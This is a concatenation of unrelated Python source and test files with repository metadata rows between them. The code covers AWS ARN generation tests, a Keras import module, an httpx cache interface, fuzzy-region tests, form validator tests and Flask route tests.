arn = self.arn_generator.try_generate_arn("MyAlb", resource, "Arn")
self.assertIsNone(arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_implicit_alb(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer"
})
arn = self.arn_generator.try_generate_arn("MyAlb", resource, "Ref")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/app/MyAlb/MyAlb", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_explicit_alb(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer",
'Properties': {
'Type': 'application'
}
})
arn = self.arn_generator.try_generate_arn("MyAlb", resource, "Ref")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/app/MyAlb/MyAlb", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_nlb(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer",
'Properties': {
'Type': 'network'
}
})
arn = self.arn_generator.try_generate_arn("MyNlb", resource, "Ref")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/net/MyNlb/MyNlb", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_gwy_lb(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer",
'Properties': {
'Type': 'gateway'
}
})
arn = self.arn_generator.try_generate_arn("MyGwlb", resource, "Ref")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/gwy/MyGwlb/MyGwlb", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_alb_listener(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::Listener",
'Properties': {
'Protocol': 'HTTPS'
}
})
arn = self.arn_generator.try_generate_arn("MyAlb", resource, "Ref")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:listener/app/MyAlb/MyAlb/MyAlb", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_nlb_listener(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::Listener",
'Properties': {
'Protocol': 'TCP'
}
})
arn = self.arn_generator.try_generate_arn("MyNlb", resource, "Ref")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:listener/net/MyNlb/MyNlb/MyNlb", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_gwy_listener(self):
resource = build_resource({
'Type': 'AWS::ElasticLoadBalancingV2::Listener',
'Properties': {}
})
arn = self.arn_generator.try_generate_arn("MyGwlb", resource, "Ref")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:listener/gwy/MyGwlb/MyGwlb/MyGwlb", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_alb_target_group_with_no_protocol(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::TargetGroup",
'Properties': {}
})
arn = self.arn_generator.try_generate_arn("MyAlbTargetGroup", resource, "LoadBalancerArns")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/app/MyAlbTargetGroup/MyAlbTargetGroup", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_alb_target_group(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::TargetGroup",
'Properties': {
'Protocol': 'HTTPS'
}
})
arn = self.arn_generator.try_generate_arn("MyAlbTargetGroup", resource, "LoadBalancerArns")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/app/MyAlbTargetGroup/MyAlbTargetGroup", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_nlb_target_group(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::TargetGroup",
'Properties': {
'Protocol': 'TCP'
}
})
arn = self.arn_generator.try_generate_arn("MyNlbTargetGroup", resource, "LoadBalancerArns")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/net/MyNlbTargetGroup/MyNlbTargetGroup", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_gwy_target_group(self):
resource = build_resource({
'Type': "AWS::ElasticLoadBalancingV2::TargetGroup",
'Properties': {
'Protocol': 'GENEVE'
}
})
arn = self.arn_generator.try_generate_arn("MyGwyTargetGroup", resource, "LoadBalancerArns")
self.assertEqual(f"arn:aws:elasticloadbalancing:{account_config.region}:{account_config.account_id}:loadbalancer/gwy/MyGwyTargetGroup/MyGwyTargetGroup", arn)
class WhenGeneratingAnArnForNetworkFirewallRuleGroupsAndValidatingSchema(unittest.TestCase):
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_with_no_rulegroup_type(self):
resource = build_resource({
'Type': 'AWS::NetworkFirewall::RuleGroup',
'Properties': {}
})
with self.assertRaises(ApplicationError) as cm:
self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
self.assertEqual(required_property_error('Type', 'ResourceA.Properties'), str(cm.exception))
@mock_node_evaluator_setup()
def test_with_invalid_rulegroup_type(self):
resource = build_resource({
'Type': 'AWS::NetworkFirewall::RuleGroup',
'Properties': {
'Type': []
}
})
with self.assertRaises(ApplicationError) as cm:
self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
self.assertEqual(expected_type_error('ResourceA.Properties.Type', 'string', '[]'), str(cm.exception))
# Network Firewall Rulegroup resources have a specific pattern that depends on if the NFW rule is stateful or stateless
class WhenGeneratingAnArnForNetworkFirewallRuleGroups(unittest.TestCase):
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_does_not_generate_arn_for_alb_attributes(self):
resource = build_resource({'Type': "AWS::NetworkFirewall::RuleGroup"})
arn = self.arn_generator.try_generate_arn("MyNFW", resource, "Arn")
self.assertIsNone(arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_stateful_rulegroup(self):
resource = build_resource({
'Type': "AWS::NetworkFirewall::RuleGroup",
'Properties': {
'Type': 'STATEFUL'
}
})
arn = self.arn_generator.try_generate_arn("MyNfw", resource, "Ref")
self.assertEqual(f"arn:aws:network-firewall:{account_config.region}:{account_config.account_id}:stateful-rulegroup/MyNfw", arn)
@mock_node_evaluator_setup()
def test_generates_arn_for_stateless_rulegroup(self):
resource = build_resource({
'Type': "AWS::NetworkFirewall::RuleGroup",
'Properties': {
'Type': 'STATELESS'
}
})
arn = self.arn_generator.try_generate_arn("MyNfw", resource, "Ref")
self.assertEqual(f"arn:aws:network-firewall:{account_config.region}:{account_config.account_id}:stateless-rulegroup/MyNfw", arn)
| 39.66563
| 165
| 0.641012
| 2,521
| 25,505
| 6.194367
| 0.077747
| 0.048412
| 0.046107
| 0.061988
| 0.849321
| 0.844262
| 0.821081
| 0.802766
| 0.790151
| 0.775551
| 0
| 0.001027
| 0.236581
| 25,505
| 642
| 166
| 39.727414
| 0.800986
| 0.012311
| 0
| 0.67433
| 0
| 0.032567
| 0.256771
| 0.152053
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.109195
| false
| 0
| 0.009579
| 0
| 0.153257
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c04565f9c6906e3c515e7bbdd58c77236aa3840f
| 24
|
py
|
Python
|
skynet/home/__init__.py
|
brianjyee/skynet
|
924f9d153bf436a99aa7199fa3949f425d7ce05d
|
[
"BSD-2-Clause"
] | 6
|
2017-03-17T14:15:58.000Z
|
2018-05-31T04:27:12.000Z
|
skynet/home/__init__.py
|
brianjyee/skynet
|
924f9d153bf436a99aa7199fa3949f425d7ce05d
|
[
"BSD-2-Clause"
] | null | null | null |
skynet/home/__init__.py
|
brianjyee/skynet
|
924f9d153bf436a99aa7199fa3949f425d7ce05d
|
[
"BSD-2-Clause"
] | 4
|
2017-03-22T23:42:22.000Z
|
2018-09-29T23:47:33.000Z
|
from .views import home
| 12
| 23
| 0.791667
| 4
| 24
| 4.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c04a377ca404dbec86f1ae651798bc0c1ef18297
| 102
|
py
|
Python
|
ask/blog/views.py
|
ztp99/pywebstepic
|
59ffd969cb8dc0d602941d6676757cc4e9f7858b
|
[
"Apache-2.0"
] | null | null | null |
ask/blog/views.py
|
ztp99/pywebstepic
|
59ffd969cb8dc0d602941d6676757cc4e9f7858b
|
[
"Apache-2.0"
] | null | null | null |
ask/blog/views.py
|
ztp99/pywebstepic
|
59ffd969cb8dc0d602941d6676757cc4e9f7858b
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
# blog
def home(request):
return HttpResponse('Hello World')
| 17
| 38
| 0.754902
| 13
| 102
| 5.923077
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 102
| 5
| 39
| 20.4
| 0.895349
| 0.039216
| 0
| 0
| 0
| 0
| 0.114583
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
c05b53fc9b1738070bd9ea6516b9ff428c008ed2
| 2,020
|
py
|
Python
|
venv/Lib/site-packages/tensorflow_core/python/keras/api/keras/applications/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/python/keras/api/keras/applications/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/python/keras/api/keras/applications/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Keras Applications are canned architectures with pre-trained weights.
"""
from __future__ import print_function as _print_function
import sys as _sys
from . import densenet
from . import imagenet_utils
from . import inception_resnet_v2
from . import inception_v3
from . import mobilenet
from . import mobilenet_v2
from . import nasnet
from . import resnet
from . import resnet50
from . import resnet_v2
from . import vgg16
from . import vgg19
from . import xception
from tensorflow.python.keras.applications import DenseNet121
from tensorflow.python.keras.applications import DenseNet169
from tensorflow.python.keras.applications import DenseNet201
from tensorflow.python.keras.applications import InceptionResNetV2
from tensorflow.python.keras.applications import InceptionV3
from tensorflow.python.keras.applications import MobileNet
from tensorflow.python.keras.applications import MobileNetV2
from tensorflow.python.keras.applications import NASNetLarge
from tensorflow.python.keras.applications import NASNetMobile
from tensorflow.python.keras.applications import ResNet101
from tensorflow.python.keras.applications import ResNet101V2
from tensorflow.python.keras.applications import ResNet152
from tensorflow.python.keras.applications import ResNet152V2
from tensorflow.python.keras.applications import ResNet50
from tensorflow.python.keras.applications import ResNet50V2
from tensorflow.python.keras.applications import VGG16
from tensorflow.python.keras.applications import VGG19
from tensorflow.python.keras.applications import Xception
del _print_function
from tensorflow.python.util import module_wrapper as _module_wrapper
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
_sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
_sys.modules[__name__], "keras.applications", public_apis=None, deprecation=True,
has_lite=False)
| 40.4
| 87
| 0.844554
| 253
| 2,020
| 6.577075
| 0.300395
| 0.192308
| 0.228365
| 0.270433
| 0.524038
| 0.524038
| 0.058894
| 0.058894
| 0.058894
| 0
| 0
| 0.024685
| 0.097525
| 2,020
| 49
| 88
| 41.22449
| 0.888097
| 0.09703
| 0
| 0
| 1
| 0
| 0.009912
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.871795
| 0
| 0.871795
| 0.051282
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fbfb64a992942b1da297cf671017568072aecfd6
| 2,501
|
py
|
Python
|
httpx_cache/cache/base.py
|
obendidi/httpx-cache
|
897dd8da5bb377ed7f61b367716976bdc0d581b1
|
[
"BSD-3-Clause"
] | 16
|
2021-12-13T01:27:44.000Z
|
2022-02-28T02:58:46.000Z
|
httpx_cache/cache/base.py
|
obendidi/httpx-cache
|
897dd8da5bb377ed7f61b367716976bdc0d581b1
|
[
"BSD-3-Clause"
] | 23
|
2022-01-03T15:57:39.000Z
|
2022-03-28T22:25:08.000Z
|
httpx_cache/cache/base.py
|
obendidi/httpx-cache
|
897dd8da5bb377ed7f61b367716976bdc0d581b1
|
[
"BSD-3-Clause"
] | 2
|
2022-01-21T17:57:19.000Z
|
2022-01-21T18:18:47.000Z
|
import typing as tp
from abc import ABC, abstractmethod
import httpx
class BaseCache(ABC):
@abstractmethod
def get(self, request: httpx.Request) -> tp.Optional[httpx.Response]:
"""Get cached response from Cache.
We use the httpx.Request.url as key.
Args:
request: httpx.Request
Returns:
tp.Optional[httpx.Response]
"""
@abstractmethod
async def aget(self, request: httpx.Request) -> tp.Optional[httpx.Response]:
"""(Async) Get cached response from Cache.
We use the httpx.Request.url as key.
Args:
request: httpx.Request
Returns:
tp.Optional[httpx.Response]
"""
@abstractmethod
def set(
self,
*,
request: httpx.Request,
response: httpx.Response,
content: tp.Optional[bytes] = None
) -> None:
"""Set new response entry in cache.
In case the response does not yet have a '_content' property, content should
be provided in the optional 'content' kwarg (usually using a callback)
Args:
request: httpx.Request
response: httpx.Response, to cache
content (bytes, optional): Defaults to None, should be provided in case
response that not have yet content.
"""
@abstractmethod
async def aset(
self,
*,
request: httpx.Request,
response: httpx.Response,
content: tp.Optional[bytes] = None
) -> None:
"""(Async) Set new response entry in cache.
In case the response does not yet have a '_content' property, content should
be provided in the optional 'content' kwarg (usually using a callback)
Args:
request: httpx.Request
response: httpx.Response, to cache
content (bytes, optional): Defaults to None, should be provided in case
response that not have yet content.
"""
@abstractmethod
def delete(self, request: httpx.Request) -> None:
"""Delete an entry from cache.
Args:
request: httpx.Request
"""
@abstractmethod
async def adelete(self, request: httpx.Request) -> None:
"""(Async) Delete an entry from cache.
Args:
request: httpx.Request
"""
def close(self) -> None:
"""Close cache."""
async def aclose(self) -> None:
"""(Async) Close cache."""
| 26.326316
| 84
| 0.580568
| 278
| 2,501
| 5.215827
| 0.205036
| 0.115862
| 0.157241
| 0.095172
| 0.834483
| 0.797241
| 0.797241
| 0.797241
| 0.733793
| 0.671724
| 0
| 0
| 0.328269
| 2,501
| 94
| 85
| 26.606383
| 0.863095
| 0.237905
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.1
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
226801c939ef67ceb3068ea5a2e555afc9eb516c
| 26
|
py
|
Python
|
terrascript/softlayer/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/softlayer/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/softlayer/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | 1
|
2018-11-15T16:23:05.000Z
|
2018-11-15T16:23:05.000Z
|
"""2019-05-28 10:50:36"""
| 13
| 25
| 0.538462
| 6
| 26
| 2.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.583333
| 0.076923
| 26
| 1
| 26
| 26
| 0
| 0.730769
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
97ec13aa7ab2fd0f155e64b9bb056deceb22f82e
| 2,588
|
py
|
Python
|
tests/test_wm.py
|
matheuscas/pyfuzzy_toolbox
|
57885f3ff53d1b7ab3559c7ff6197ceb97f67c3b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_wm.py
|
matheuscas/pyfuzzy_toolbox
|
57885f3ff53d1b7ab3559c7ff6197ceb97f67c3b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_wm.py
|
matheuscas/pyfuzzy_toolbox
|
57885f3ff53d1b7ab3559c7ff6197ceb97f67c3b
|
[
"BSD-3-Clause"
] | null | null | null |
from pyfuzzy_toolbox import wm
import numpy as np
from nose.tools import raises
@raises(TypeError)
def test_generate_regions_right_range_type():
regions = wm.generate_regions(range(0, 1), 5)
@raises(TypeError)
def test_generate_regions_right_N_type():
regions = wm.generate_regions(np.arange(0, 1.01, 0.01), 2.5)
def test_generate_regions_right_numbet_of_regions_for_N_0():
N = 0
_range = np.arange(0, 1.01, 0.01)
regions = wm.generate_regions(_range, N)
assert len(regions) == 1
assert regions[0].params == [0, 0.5, 1]
assert (regions[0].range == _range).all()
def test_generate_regions_right_numbet_of_regions_for_N_1():
N = 1
_range = np.arange(0, 1.01, 0.01)
regions = wm.generate_regions(_range, N)
assert len(regions) == 3
assert regions[1].params == [0, 0.5, 1]
assert regions[0].params == [0, 0, 0.5]
assert regions[2].params == [0.5, 1, 1]
def test_generate_regions_right_numbet_of_regions_for_N_1_and_negative_range():
N = 1
_range = np.linspace(-1, 1, num=101)
regions = wm.generate_regions(_range, N)
assert len(regions) == 3
assert (regions[1].params[1] - regions[1].params[0]
) == (regions[1].params[2] - regions[1].params[1])
def test_generate_regions_right_numbet_of_regions_for_N_2():
N = 2
_range = np.arange(0, 15.01, 0.01)
regions = wm.generate_regions(_range, N)
assert len(regions) == 5
assert (regions[0].params[2] - regions[0].params[0]
) == (regions[2].params[2] - regions[2].params[1])
assert (regions[1].params[2] - regions[1].params[0]
) == (regions[2].params[2] - regions[2].params[0])
assert (regions[2].params[2] - regions[2].params[0]
) == (regions[3].params[2] - regions[3].params[0])
assert (regions[4].params[2] - regions[4].params[0]
) == (regions[3].params[2] - regions[3].params[1])
def test_generate_regions_right_numbet_of_regions_for_N_2_and_negative_range():
N = 2
_range = np.linspace(-9, 0, num=101)
regions = wm.generate_regions(_range, N)
assert len(regions) == 5
assert (regions[0].params[2] - regions[0].params[0]
) == (regions[2].params[2] - regions[2].params[1])
assert (regions[1].params[2] - regions[1].params[0]
) == (regions[2].params[2] - regions[2].params[0])
assert (regions[2].params[2] - regions[2].params[0]
) == (regions[3].params[2] - regions[3].params[0])
assert (regions[4].params[2] - regions[4].params[0]
) == (regions[3].params[2] - regions[3].params[1])
| 35.944444
| 79
| 0.638717
| 403
| 2,588
| 3.903226
| 0.104218
| 0.075652
| 0.151303
| 0.097902
| 0.867133
| 0.818818
| 0.818818
| 0.726637
| 0.699936
| 0.699936
| 0
| 0.072588
| 0.190881
| 2,588
| 71
| 80
| 36.450704
| 0.678606
| 0
| 0
| 0.578947
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.122807
| false
| 0
| 0.052632
| 0
| 0.175439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
97ef354cb00695fca6fd3a0fc54aba0e38c9eb12
| 19
|
py
|
Python
|
writing/utils/__init__.py
|
akyruu/blender-cartography-addon
|
4f34b029d9b6a72619227ab3ceaed9393506934e
|
[
"Apache-2.0"
] | null | null | null |
writing/utils/__init__.py
|
akyruu/blender-cartography-addon
|
4f34b029d9b6a72619227ab3ceaed9393506934e
|
[
"Apache-2.0"
] | null | null | null |
writing/utils/__init__.py
|
akyruu/blender-cartography-addon
|
4f34b029d9b6a72619227ab3ceaed9393506934e
|
[
"Apache-2.0"
] | null | null | null |
from . import line
| 9.5
| 18
| 0.736842
| 3
| 19
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 19
| 1
| 19
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3f15dd8a120396cbf6ec20295b8585d057ec0f30
| 148
|
py
|
Python
|
vilya/models.py
|
xtao/vilya
|
39afda324bcfe9eefe7d813381d5b1627ba00ae5
|
[
"BSD-3-Clause"
] | 2
|
2015-01-15T09:10:57.000Z
|
2015-01-15T09:55:10.000Z
|
vilya/models.py
|
xtao/vilya
|
39afda324bcfe9eefe7d813381d5b1627ba00ae5
|
[
"BSD-3-Clause"
] | null | null | null |
vilya/models.py
|
xtao/vilya
|
39afda324bcfe9eefe7d813381d5b1627ba00ae5
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from .projects.models import *
from .users.models import *
from .issues.models import *
from .pullrequests.models import *
| 21.142857
| 34
| 0.709459
| 19
| 148
| 5.526316
| 0.526316
| 0.457143
| 0.457143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007937
| 0.148649
| 148
| 6
| 35
| 24.666667
| 0.825397
| 0.141892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
3f2764bb5f87b8685f3562c1f90b5a820c979b3d
| 3,046
|
py
|
Python
|
tests/app/validation/test_month_year_validator.py
|
ONSdigital/census-survey-runner
|
9f8cd3d664db5c5b49d348bdf48c58d1a3492aab
|
[
"MIT"
] | null | null | null |
tests/app/validation/test_month_year_validator.py
|
ONSdigital/census-survey-runner
|
9f8cd3d664db5c5b49d348bdf48c58d1a3492aab
|
[
"MIT"
] | 3
|
2018-10-10T08:19:07.000Z
|
2018-10-29T11:43:08.000Z
|
tests/app/validation/test_month_year_validator.py
|
ONSdigital/census-survey-runner
|
9f8cd3d664db5c5b49d348bdf48c58d1a3492aab
|
[
"MIT"
] | 1
|
2021-04-11T08:04:22.000Z
|
2021-04-11T08:04:22.000Z
|
import unittest
from unittest.mock import Mock
from wtforms.validators import ValidationError
from app.validation.error_messages import error_messages
from app.validation.validators import MonthYearCheck
class TestMonthYearValidator(unittest.TestCase):
def test_month_year_date_validator_none(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = None
mock_form.year.data = None
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_empty_string(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = ''
mock_form.year.data = ''
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_missing_month(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = ''
mock_form.year.data = '2017'
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_missing_year(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = '12'
mock_form.year.data = ''
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_invalid_month(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = '13'
mock_form.year.data = '2017'
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_invalid_year(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = '12'
mock_form.year.data = '17'
mock_field = Mock()
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['INVALID_DATE'], str(ite.exception))
def test_month_year_date_validator_valid(self):
validator = MonthYearCheck()
mock_form = Mock()
mock_form.month.data = '01'
mock_form.year.data = '2017'
mock_field = Mock()
try:
validator(mock_form, mock_field)
except ValidationError:
self.fail('Valid date raised ValidationError')
| 28.203704
| 76
| 0.662837
| 347
| 3,046
| 5.541787
| 0.135447
| 0.116485
| 0.087363
| 0.058242
| 0.826833
| 0.813313
| 0.798232
| 0.798232
| 0.781071
| 0.781071
| 0
| 0.009578
| 0.245896
| 3,046
| 107
| 77
| 28.46729
| 0.827601
| 0
| 0
| 0.7
| 0
| 0
| 0.041694
| 0
| 0
| 0
| 0
| 0
| 0.171429
| 1
| 0.1
| false
| 0
| 0.071429
| 0
| 0.185714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3f7364c93368e0f43aae71f4af38d5cbbfe48831
| 11,309
|
py
|
Python
|
tests/test_routes_exhibition.py
|
purwin/Parks-Database
|
98cb06dbfacf73c300f32d55f0872fb63ff4a906
|
[
"MIT"
] | null | null | null |
tests/test_routes_exhibition.py
|
purwin/Parks-Database
|
98cb06dbfacf73c300f32d55f0872fb63ff4a906
|
[
"MIT"
] | 2
|
2021-03-09T19:47:01.000Z
|
2022-02-10T19:41:33.000Z
|
tests/test_routes_exhibition.py
|
purwin/Parks-Database
|
98cb06dbfacf73c300f32d55f0872fb63ff4a906
|
[
"MIT"
] | null | null | null |
import unittest
from flask import request
from datetime import date, datetime
from app import db
from app.parks_db import Exhibition
from base import BaseTests
def format_date(date_text):
if not date_text:
return None
for style in ('%Y-%m-%d', '%m.%d.%Y', '%m.%d.%y', '%m/%d/%Y', '%m/%d/%y'):
try:
# Determine style of date string
date = datetime.strptime(str(date_text), style)
# Return date object
return date
except ValueError:
pass
raise ValueError('Can\'t determine date format of {}!'.format(date_text))
class TestRoutesExhibition(BaseTests):
default_exhibition = dict(
name='Swanky Exhibition',
start_date=format_date('2019-01-01'),
end_date=format_date('2019-06-01'),
opening=format_date('2019-01-01'),
comments='',
install_start=format_date('2018-12-28'),
install_end=format_date('2019-01-01'),
prm='',
approval='',
walkthrough='',
cb_presentation='',
license_mailed='',
license_signed='',
license_borough='',
bond='',
coi='',
coi_renewal='',
signage_submit='',
signage_received='',
press_draft='',
press_approved='',
web_text='',
work_images='',
deinstall_date=format_date('2019-06-05'),
deinstall_check='',
bond_return='',
press_clippings=''
)
default_exhibition_string = dict(
name='Swanky Exhibition',
start_date='2019-01-01',
end_date='2019-06-01',
opening='2019-01-01',
comments='',
install_start='2018-12-28',
install_end='2019-01-01',
prm='',
approval='',
